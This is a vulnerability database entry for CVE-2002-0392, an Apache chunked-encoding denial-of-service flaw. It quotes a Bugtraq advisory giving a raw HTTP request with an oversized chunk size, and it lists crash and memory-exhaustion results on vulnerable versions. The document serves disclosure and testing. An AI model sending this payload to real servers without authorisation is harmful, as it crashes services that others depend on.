Chunked transfer error

Against

Apache on Windows, Linux, *BSD, Unix

IDs

CVE: CVE-2002-0392
CERT-Vuln: 944335
Bugtraq: 5033
CERT-Advisory: CA-2002-17

Category

Signed interpretation of unsigned value

Effect

Denial of Service

Source

Bugtraq

Description

From the Bugtraq posting.

Greetings sweaty Apache admins,


    Now that the Apache group has released official fixes, here is a
test string that can be used to check if your server is vulnerable:


POST /x.html HTTP/1.1
Host: 192.168.x.x
Transfer-Encoding: chunked

80000000
Rapid 7
0


Here is the behavior that the above string will produce:

UNIX:

    Apache 1.3.24:
        Connection is instantly dropped.
        The connection is not logged in the access_log, but the following
            will appear in the error_log:

        [Mon Jun 17 16:12:25 2002] [notice] child pid 21452 exit signal
        Segmentation fault (11)

    Apache 2.0.36:
        No effect!  Hmmm...

Win32:

    Apache 1.3.24:
        Connection is instantly dropped.
        The connection is *not* logged in access_log nor error_log!

    Apache 2.0.36:
        Connection appears to hang while child thread consumes all
            available memory.  After a minute or two, the OS reports that
            virtual memory is exhausted via a server-side dialog box.
            A remote client cannot determine the result of this test
            because the connection remains open until the dialog box is
            dismissed.  A non-vulnerable server will not drop the
            connection because it is waiting to receive 2 gigabytes of
            legitimately chunked data.
        The connection is not logged in access_log, but the following will
            appear in the error_log:

        [Tue Jun 18 09:16:34 2002] [notice] Parent: child process exited
        with status 3221225477 -- Restarting.


- ---

    Note that in the test string above, you can interchange the "POST"
with "GET", and you can use any hex value between 80000000 and
FFFFFFFF for the chunk size.
    Comments are much appreciated.


    - Joe Testa


GPG key:  http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52  AD6D 65B2 F5DF 4B11 06B4

Attack string

GET /x.html HTTP/1.1
Host: 192.168.x.x
Transfer-Encoding: chunked

80000000
Rapid 7
0

Attack program source

None available.